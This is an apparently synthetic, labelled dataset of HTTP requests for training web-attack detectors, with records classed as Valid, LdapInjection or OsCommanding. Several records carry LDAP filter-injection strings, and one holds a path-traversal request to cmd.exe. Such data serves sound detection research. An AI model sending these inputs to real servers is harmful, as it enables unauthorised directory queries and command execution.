Accept: video/*;q=0.8, video/quicktime;q=0.3, video/*;q=0.9
Accept-Charset: x-mac-greek;q=0.9, x-mac-turkish;q=0.0
Accept-Encoding: identity, deflate;q=0.4, deflate, identity;q=0.8
Accept-Language: e-ygqv;q=0.0, idieN-rjdom;q=0.1, 7ih-areoa;q=0.1, n-tNeye8tI
Cache-Control: only-if-cached
Client-ip: 56.112.127.62
Cookie: ta6rbcvehhnec=o8an;ga6gna=7gI;1TmoergmIshnc=inwo-VuSrJp;ie8z0iuStr=2469336;tentren1crnedai=whglET:m0se;nd3u4h=4
Cookie2: $Version="9"
Date: Sun, 10 Oct 04 01:38:50 GMT
ETag: W/"g@9KH0sEjAkNzF2r"
Expect: ahiWkN=nO6ei
From: 8EqrmfL@m6me9i3j.cz
If-Modified-Since: Fri, 08 Sep 06 13:58:39 CET
If-Unmodified-Since: Thu, 15 Apr 10 02:01:11 GMT
If-Match: *
If-None-Match: "95dITTUXPTlgzhu_OY"
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 3
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=95C88C7A
Range: 80-3804,023297-91,09-
Referer: http://www.kIeeoe.cz/tte8.jpg
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.0 (X11; U; Linux i586 4.8; eR-tb; rv:4.4.0) Gecko/55487459
UA-CPU: StrongARM
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 636x9570
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42132
Start - Id: 38025
class: LdapInjection
GET /edc3Thn/atteiq4Iaiomsolg/oPbgei/oJHi/hPy34ZU_.asmx?to5ehsint=0r2tsO&dhxh=5678871&frvrahsbgi=38&cl=5428%29%28%26%28objectClass%3Days%29%28%7C%28sn+%3Dca%29%28cn%3DEL+++++J*%29%29 HTTP/1.0
Host: 178.145.151.72
Connection: iyPz4
Accept: image/*;q=0.0, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, identity, compress
Accept-Language: 27tni-tr;q=0.6, r-Obtyaqf, raey-t
Cache-Control: no-store
Client-ip: 252.123.213.7
Cookie: _ORh0WHwLX=eRiwli8EdeDh;aflrsr6q9=d9upsns;tlfy5oaegisoMae=1bs;B93odtohcoihssb=wfAr7Z7L1;ranorEqGwn77h1=c
Cookie2: $Version="157"
Date: Fri, 17 Oct 08 24:06:00 UTC
ETag: "c@9mSDK4Mtu5MpRA24Q_"
Expect: eaes4=oetnrgT
From: aFbh@rtrss.de
If-Modified-Since: Sun, 14 Mar 04 01:33:24 CET
If-Unmodified-Since: Tue, 04 Dec 07 20:00:12 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Aug 05 14:26:52 GMT
Max-Forwards: 44
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM TDdZaTluc0xseGhwNHlJbW5mZXRhYWhpZG9yc29vZW0=
Range: 67-6,809162-
Referer: http://Oybyrt1S.ch/lexaoe/ttEhiayd.pdf
TE: chunked;q=0.5,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: 3knea/2.6.2.4
UA-CPU: Sparc
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 427x816
Via: 0.7 227.157.63.126, 8.0 116.129.116.244
Transfer-Encoding: gzip
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 387 34.107.120.26 "eds5WnaDitshnsboeba" "Sun, 22 Jan 06 09:42:50 CET"
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38025
Start - Id: 24923
class: Valid
GET /ocntjetagl0moed/zgCozW/as.SdH.3aMmoi/reqMtde/no1VrSRdvfKm2Fs4/tpehlmknenednlni.cgi? HTTP/1.0
Host: www.eekeEbt.de:0
Connection: close
Accept: image/jpeg, image/jpeg, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.5
Accept-Language: mto-twd3;q=0.8, roe3-ohe
Cache-Control: max-age=3
Client-ip: 210.63.57.145
Cookie: _LIGPX=91675;nneekiiefvuc=4199788;shsymnhil9=neneucrb|q;5ih=0316
Cookie2: $Version="0"
Date: Thu, 11 Dec 08 14:33:46 GMT
ETag: W/"94Jp1voaoqMA_sTF"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sat, 27 May 06 09:58:36 GMT
If-Unmodified-Since: Thu, 11 Jan 07 15:22:48 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Sep 04 15:31:58 UTC
Max-Forwards: 3
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic b3dyYTplcklkaGc=
Range: -47448,86125-296,-084
Referer: http://www.deloRT.net/oNiltAih/spibse/rfh3asM.cgi
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 1.6; Ni-yc; rv:9.8.0) Gecko/56426075
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8559x9210
Via: 0.4 146.123.34.221, 7.6 52.61.71.68
Transfer-Encoding: cjcuh
Upgrade: isab/2.8
Warning: 612 www.dskecR.jpg:8674 "r2eeilfhshdeecbm" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24923
Start - Id: 37955
class: LdapInjection
GET /z6edzq4V0q0Tchild0./tdl9r0efoseeq/1FYH3h.th/paletTiDnfySidrgekbe/s-p48/iZq8.msf?WTAu=6&iQrI00wtsin2nir=r&aumttgdoedf=2&escopnu6Freopi=0559269724&dtEtbe2iNqc2=hnse++&qlinkhhavingj=%29%28+++%7C++++%28displayName%3Dhad*%29%28name++%3D++had*++%29%28++mail%3Dhad*+%29&3r=%26t%29Akpassthrut&cF96mpof=yiCaeevIntonx&mrrLt=ham1idodusr&3pechit=elm HTTP/1.0
Host: www.kst3RaE.com:3
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.7
Accept-Language: ia-ed;q=0.0, w-CuRo;q=0.7, uqrmzere-ooorahf2, nsyts-wlctlw
Cache-Control: max-stale=1416
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="69"
Date: Mon, 17 Oct 05 23:40:51 UTC
ETag: "Xry4eogdLPlMSdnufTwb"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Sat, 28 Feb 09 07:39:17 GMT
If-Unmodified-Since: Sun, 21 Dec 08 24:32:52 GMT
If-Match: "ffXy4AghlMwq7gR9-nmt"
If-None-Match: *
If-Range: Sun, 21 Oct 07 20:06:21 UTC
Max-Forwards: 821
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: ndeT l2ftnt=toae
Range: 03-,-49
Referer: /bs7Arcc/wilnd/eOoxre/nFkeeN/aeemTn.cgi
TE: deflate;q=0.1
Trailer: Pragma
User-Agent: Mozilla/1.6 (compatible; MSIE 1.3; Linux i586; 6eEetfqv)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 481 177.253.141.56 "egtt5attjooa" "Sun, 25 Apr 10 02:18:55 GMT"
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37955
Start - Id: 37063
class: LdapInjection
GET /sepeerogA/oYd2jszTx/opcQ75LQui7rzww/i3li794PHc/cP3-QrRzr0dp/sreiiasn.bin?8CcNDfgJI_=%29%28+%7C++++%28++++cn%3D*o++++%27brien*++++%29%28mail++%3D*o++++%27brien*++%29++++&ieo=r&1t7=2 HTTP/1.0
Host: 124.98.242.232
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.6, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.87.115.154
Cookie: leesi4i3=3
Cookie2: $Version="212"
Date: Sun, 14 Feb 10 24:30:03 UTC
ETag: "3V52_A2tnUSoPxJz"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: *
If-None-Match: "UsCAvA1-v8zblnlzXHlb"
If-Range: *
Max-Forwards: 497
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Basic anRlcEVuOnN3dWVnMXBr
Range: 03242-,-0
Referer: /sxezigbs/AgasejnT/w3aw5me/aJsic.jpeg
TE: gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: ophtaYdxiZilss9w
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/8.7 86.180.61.185
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 0.114.107.58
X-Serial-Number: 595061014884085769
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37063
Start - Id: 37413
class: LdapInjection
GET /d2isb6mIZYpg5SRY/eb/eVld7CAs_4kM6/p4NE_CHbR_j4F/myqlazvvF/azWcvg3JbxU_lZE4.png?USIG2X=i.SJnYEt4wYL&hab7mmhdFhfco2=l%5C6aznsock_streamrtoEvzo HTTP/1.0
Host: 144.141.40.75:2073
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=51266
Client-ip: 188.193.125.170
Cookie: MeNoecoaapeubn8=e;vHXHC=490458;.ivar4ncRCDW=ra)(|   (Truu=*);AexecZL7P=iy:
Cookie2: $Version="85"
Date: Wed, 02 May 07 01:08:54 CET
ETag: "hykp_z-@oEb2W0RoC9fz"
Expect: 100-continue
From: ylaehes@rkROaehlv.ch
If-Modified-Since: Thu, 20 Apr 06 04:22:37 CET
If-Unmodified-Since: Mon, 13 Jul 09 03:07:54 CET
If-Match: "XnNsr3lpbdndC-xXz4_"
If-None-Match: *
If-Range: Thu, 02 Nov 06 09:57:45 UTC
Max-Forwards: 356
MIME-Version: 3.5
Pragma: tpstoc='n'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: Digest nc=3e1DCeaC
Range: 747728-0693
Referer: /rjteb/bruae2/dkSaSN.zip
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: bouL (eLqHHC7PHP)
UA-CPU: Sparc
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 516x5876
Via: 7.7 245.21.231.13, 4.3 www.xaiat.gif:04
Transfer-Encoding: compress
Upgrade: inCnt/4.0, wfn/1.0
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 63.251.171.158
X-Serial-Number: 14452440707271
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37413
Start - Id: 5034
class: Valid
PUT /mg8H409@7pvVT.html? HTTP/1.1
Content-Length: 199
Content-Language: DKmhsdb,e
Content-Encoding: deflate
Content-Location: /norEseie.tar
Content-MD5: ZWR6Y256OXI2YW5vbnRzTw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Jun 09 16:33:13 GMT
Last-Modified: Sun, 19 Jun 05 09:07:39 CET
Host: www.egdA.be
Connection: close
Accept: image/*;q=0.5, application/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: isy-f8e;q=0.0
Cache-Control: fqdll='dnj'
Client-ip: 217.150.24.204
Cookie: fejtfgkndirteee=u7;cisr=T;eioxAtlai0e=2en5dnlsaphp;fuuess2ntr7tS=@c;weso=91959
Cookie2: $Version="5"
Date: Tue, 13 May 08 03:46:06 CET
ETag: W/".Bi_QuUolmqoYV_RGo"
Expect: 100-continue
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 09 Jun 09 06:38:53 UTC
If-Unmodified-Since: Mon, 29 Mar 10 16:22:33 CET
If-Match: "GC3NeRBNQFC1iLxA_PVQ"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 9.0
Pragma: Elrl=wdusr
Proxy-Authorization: eifxir Asissg2=aadrN
Authorization: NTLM NGFlcnRzaWRsVXRob2FpeHNhZUlxcnJhcmF0YWh0Y3Nyc3hheW1uZGRuM2U2Y2U=
Range: -809077,653-170430,-158191
Referer: http://bftore.org/siaort/e5ohiiso.jpeg
TE: gzip,trailers,trailers
Trailer: Accept-Language
User-Agent: e4ebvmyN http://www.peee.st
UA-CPU: StrongARM
UA-Disp: 522,847,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4111x328
Via: 0.1 92.142.145.185, 1.0 42.214.5.151
Transfer-Encoding: gzip
Upgrade: mno/9.6, n8Te/3.4
Warning: 707 0.240.235.64 "eeosAfhomel" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rdiats=ap &o8slhen=~&eanehy=9033&ii3Q=48546752&lhe4hWleomeor=1&whereDowDqautoexecaccept=ySWxWwWlVvL&stO23=peiece2eg&eosdnnjlehipde=uMs4R__p&itaSry=lT8ti6tzTsV&hotenenttnrrs=trgXmla06ss&bIeJPPi=0504

End - Id: 5034
Start - Id: 8553
class: Valid
GET /cvsLad@qv7ZRsvbUTaj/7-2tI_e-YKqA0/o5@@fobjecttall/z-X@36/qyW/amrasmimpenn/dXM2ACtHxo-KVxkwffw/o7Ik7uZf/g5nirbe2us/cokedlit/rqhsrdneut5neoEEE.jpeg?pA6n3hi=a2.uHO17&0bNr.=3&wnzree5r=ixZyX5&th9on9flpYTlhO=ybhomersdyheecho0nt98tmpaeexeci&eggl=Pe%29Ta&dCTdATs3vaR=exApgEivcdlTyetpm&zUvMvU=sx7Z_lDR78vt&9siu6eorr=wnKRLdIMq9Y&0eeaoIe=t8ayn HTTP/1.1
Host: 174.172.48.106
Connection: tel7
Accept: application/*;q=0.5
Accept-Charset: x-mac-roman, x-mac-greek, euc-kr;q=0.2, shift_jis
Accept-Encoding: identity, deflate;q=0.4, identity;q=0.3, identity;q=0.9
Accept-Language: h-rrvNaaa, xim9mr5t-o, yLh-nhosw, rI-3tkee, ieu-rcnlnHh
Cache-Control: only-if-cached
Client-ip: 77.176.94.89
Cookie: os=surs=at;ruDisa7N4o=ctTmeebze;tmpQPqlsS4insertmZW=815
Cookie2: $Version="667"
Date: Mon, 10 Apr 06 21:05:25 CET
ETag: W/"xDX2W8T9A@lrb-.t"
Expect: 100-continue
From: hiao@Soldae.uk
If-Modified-Since: Wed, 09 Jun 04 18:56:44 UTC
If-Unmodified-Since: Tue, 22 May 07 12:42:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:20:28 UTC
Max-Forwards: 422
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM SWlvZTdjZW5ub2RubGFoc3Noa3RwY2FpZTlSb2thcnRzczd0Z2c=
Range: 288-033,80242-026
Referer: http://Udyiizy.org/eaHjtt/urehen/nhricd.js
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Language
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 4.2; ua-Oc; rv:1.3.0) Gecko/90868449
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 108x957
Via: 1.0 249.15.77.242, 6.9 225.184.91.60, FTP/2.0 www.rxuerw.jpeg:723
Transfer-Encoding: gzip
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 205 110.208.245.212 "enTsei3aSmi1thob" 
X-Forwarded-For: 170.20.120.214
X-Serial-Number: 1101244
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 8553
Start - Id: 31776
class: Valid
GET /TWoVinlA7vzhBBvi/TEquSnoed0y/eelo/nlws/k-nD8/nleKK/lua5attgxrlgk/epzr.tiff?rmel7anue=iel&Arc1cnfcavm9=tP-Aja-mwU7&llesimiTy=n&pcidfl=%28&DVzVPconnectdG=%5C%3Be+v6+ande&srnS3haftiea=425169 HTTP/1.0
Host: 104.120.69.84
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: zL9='uwuRt1'
Client-ip: 45.140.255.145
Cookie: uJahWM-=p4hOEf1H1k;V9iidt0Tms=nRn;qobnscl=aAvOSJb6;Tna= yresaupg;qed6aL=5;gOZzhd=Hdf
Cookie2: $Version="45"
Date: Wed, 19 Apr 06 09:53:23 UTC
ETag: W/"z0-mxX4bAe7Wma560C"
Expect: fc1Ie
From: o58tOaQr@asxayh.com
If-Modified-Since: Sat, 11 Mar 06 15:21:45 UTC
If-Unmodified-Since: Thu, 24 Apr 08 15:13:54 UTC
If-Match: *
If-None-Match: "@tilC1Y5FhXh1hG"
If-Range: Wed, 21 Nov 07 11:27:31 GMT
Max-Forwards: 0
MIME-Version: 6.8
Pragma: rwnkf6=HoE
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZmhodFQ6N3J0U2Rl
Range: 1512-
Referer: http://wPIms2s.gov/eBqts/oseeneb/spjigkaa/yieq9o/oioAo7y.exe
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 0.4; nt-aa; rv:0.6.7) Gecko/50461360
UA-CPU: 68000
UA-Disp: 423,7753,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: 9.6 www.rdhf.jpeg:775, 7.7 154.95.241.91, HTTP/0.8 17.138.10.16
Transfer-Encoding: identity
Upgrade: 6tk2I/1.2, esdxbo/0.4, nfttEn/6.9, e8a/9.2, udozW/6.8
Warning: 305 245.157.171.206 "tOifDjtrdrlmuede" "Sun, 20 Aug 06 21:16:15 UTC"
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31776
Start - Id: 28759
class: Valid
GET /2rtruohxe.asp?enb=ErTttsr&o2es2blhoiei=11845&g7niiETcDd90i=65855056&tr5b=Snntigeednohyo3yhn&sn2ietZ=passwdUe&mH=jeofmgameta+u+Echavings1%3C&fnr=my%2F&99XKLmh2CD=o4SMaI_&RC=tsEaee4frl5o2m&rooolNptqyge=ahestft2nnAicqth&1Ce6mTlhepo6c=n&thiees=teba8 HTTP/1.0
Host: www.fyn5e7si.cz:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: identity;q=0.6
Accept-Language: hk-oioHm, nnfn-re;q=0.4
Cache-Control: max-age=72870
Client-ip: 189.108.26.95
Cookie: 4Eizi=5583853610;Jib.-rmor=N1'q;6UformyRMRA=x-wheret;stisfAu=19;tc=803;Hfnhnfa=osWVX2dc
Cookie2: $Version="91"
Date: Fri, 17 Jun 05 14:54:08 CET
ETag: W/"bXSYAYZf1wPqvMu4l"
Expect: 100-continue
From: yrrE0@eR1rsh.ch
If-Modified-Since: Thu, 24 Nov 05 05:18:26 CET
If-Unmodified-Since: Sat, 26 May 07 17:41:56 GMT
If-Match: *
If-None-Match: "iq1IC4emLQFr.rn1T1P_"
If-Range: Fri, 04 Dec 09 24:52:51 UTC
Max-Forwards: 9927
MIME-Version: 4.0
Pragma: isroooow='ch1t3e'
Proxy-Authorization: Digest nonce
Authorization: NTLM YWVoSWw4c2x0Z3NzZENuZDV3N2V5dDV0bWRoNnJpdHNvdGk=
Range: -756359
Referer: /lHTerg/tNws.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: Hne0qOenrHcrc1s3
UA-CPU: Sparc
UA-Disp: 062,8206,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 621x541
Via: 9.4 109.141.144.128, azat/3.7 174.190.143.24
Transfer-Encoding: compress
Upgrade: lwsi/8.0, kwn0/1.2
Warning: 186 www.8w3yeur.html "ksaPsillaLi" 
X-Forwarded-For: 52.173.254.213
X-Serial-Number: 163336409334857293
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28759
Start - Id: 24592
class: Valid
GET /iIgDzzZEskMJDh/eibJqU957LIT/dngts5enjpXtp5Bastn/fW_HG8jt@/d_w72oiD0HMN0Fs2.mspx? HTTP/1.0
Host: www.itdgnorae.com
Connection: close
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: compress
Accept-Language: *
Cache-Control: nno=crecS
Client-ip: 144.153.248.99
Cookie: mgbtetnlezca=oroostyle;rwd2s=0596670235;sfsipOleiauvr7=o=hcjnlbgsoundscript9+asallc;soetiu=7;ayoafantrhsyl=&;npxesy=1
Cookie2: $Version="416"
Date: Wed, 25 Jun 08 22:29:30 CET
ETag: W/"4dS.u20O0Z3P8h."
Expect: eeEemis
From: teiet4@sTvons.de
If-Modified-Since: Mon, 17 Dec 07 02:49:44 UTC
If-Unmodified-Since: Sat, 22 Jul 06 18:37:42 CET
If-Match: *
If-None-Match: *
If-Range: "EA41uCJOkJ02D5qWOL.T"
Max-Forwards: 0
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: http://i7hek.org/afTe/lj8gR/ezimd/pmbtfhuf.exe
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.3 (X11; U; Linux i586 9.9; pu-is; rv:4.1.6) Gecko/52120642
UA-CPU: StrongARM
UA-Disp: 1118,7867,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x848
Via: 8zHu/9.9 95.156.66.102, HTTP/2.4 www.vrelem.png
Transfer-Encoding: y3eyt
Upgrade: maOeS/3.9
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24592
Start - Id: 44449
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.alqhNTu.com
Connection: dShrNao
Accept: audio/*;q=0.4, text/plain
Accept-Charset: iso-8859-3;q=0.1, iso-8859-6
Accept-Encoding: *;q=0.1
Accept-Language: ees-nd0irrh, tnigtye-e, sTbfn-hUr, raA-rae
Cache-Control: only-if-cached
Client-ip: 241.65.49.103
Cookie: rim90EiueDeewh=752;8esIqbutZem=resehefutx6gdny;hrileen=450;rheisad6ta=5ncet]etg)i;.IzCIGf=9256250
Cookie2: $Version="65"
Date: Sun, 11 Jan 09 01:40:01 GMT
ETag: W/"CA.F4LqzUCGLA1Nk"
Expect: o7hpoac
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 22 Mar 05 11:16:42 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: "Mw5GdpOs-pGMaGM-"
If-None-Match: "vd@v72lWk_URFAico6d"
If-Range: "pKxjn-Kc8p48VK2m2L"
Max-Forwards: 4189
MIME-Version: 1.4
Pragma: h='t3tomb'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: /maiftlo7.sh
TE: chunked;q=0.0,deflate;q=0.2,deflate;q=0.1
Trailer: Expect
User-Agent: Mozilla/3.6 (compatible; MSIE 5.6; Linux i386; TEusgr7E; 6xe0EOScy)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/1.2 103.185.139.157
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44449
Start - Id: 29113
class: Valid
GET /hOh/his6nnaeeyheW/03endmngcboten9na.pl? HTTP/1.0
Host: www.vcbN.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate;q=0.8, gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 238.223.12.222
Cookie: lihaeKs=42;oeu5hlyhtNdnoe=ieu;eOtTsicmD=7;ohesafhhi4=oksmetast0swgett2;0iolSseeeho=3182107128;osrffno=rtoEnmoyy97gei
Cookie2: $Version="6"
Date: Mon, 04 Jun 07 21:39:54 CET
ETag: W/"Tzt441O3pdWReDMCcLJa"
Expect: 100-continue
From: tsdad@tzYhr4Sosc.gov
If-Modified-Since: Fri, 21 Nov 08 23:53:39 UTC
If-Unmodified-Since: Sun, 30 Nov 08 02:24:01 CET
If-Match: *
If-None-Match: "@Cs9_KeKDMv5hv6Ycw"
If-Range: "OlHmlinXDmRs6cUAoV"
Max-Forwards: 58
MIME-Version: 4.3
Pragma: sftel='oiSM'
Proxy-Authorization: aiEVod ino2qn=1ud6sw
Authorization: Basic bk4wZW04ZjY6YXNlZW96bg==
Range: 71-
Referer: /dtauibad/eedppXrx.js
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: Mozilla/2.3 (Windows; U; Win 9x 5.4; cg-zt; rv:7.9.8) Gecko/86743157
UA-CPU: x86
UA-Disp: 8585,7282,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 325x832
Via: zmtt/6.6 www.axoNhm.png:40, HTTP/9.4 www.unftt.png, 2.1 www.onnn.htm:02
Transfer-Encoding: gzip
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 711 www.heqs.tiff "w6anEbhagmiefnfsan" 
X-Forwarded-For: 6.85.252.74
X-Serial-Number: 1881707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29113
Start - Id: 25899
class: Valid
GET /SYOfJ@Pz5oMUL.css? HTTP/1.0
Host: www.aeoh1.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=242
Client-ip: 202.169.172.83
Cookie: Thttpg5tj=7;bzDJQwhereEP=|ecopy;e1=00635
Cookie2: $Version="531"
Date: Sun, 16 Apr 06 07:23:53 GMT
ETag: "6h4JtYPXoppx16y-"
Expect: 100-continue
From: bonsaIe@heieAmhcTA.gov
If-Modified-Since: Sat, 25 Nov 06 07:06:58 UTC
If-Unmodified-Since: Thu, 22 Mar 07 12:04:37 UTC
If-Match: "q2Dx-CA2QHYFajKy"
If-None-Match: "dnYQ6g95F@eHfN@zsok"
If-Range: Tue, 16 Jan 07 10:29:11 CET
Max-Forwards: 2390
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dHN0ZXNvbmVpdGhzbWxhanJsSHBhZHBlbWhvaXdRdm9sMHNhYw==
Authorization: ums1e xNri=ehoa
Range: 112-242,-6,0-
Referer: http://www.e1oiirT.de/2mri/6napn0ef.wav
TE: gzip,trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 6.8; yi-ll; rv:4.6.7) Gecko/22963474
UA-CPU: x86
UA-Disp: 291,6267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: HTTP/0.4 www.omrrfn.tiff
Transfer-Encoding: deflate
Upgrade: v4b/9.4, idShiq/5.7, hdmhO/3.7
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25899
Start - Id: 7793
class: Valid
PUT /1HH.tmpRxhttpseAarD/YFZ2uXbXjE.pl? HTTP/1.0
Content-Length: 95
Content-Language: x1tseihr,thrteeb4,rH
Content-Encoding: gzip
Content-Location: http://6n7td.cz/yodsancp/woieWee/oodsjor.png
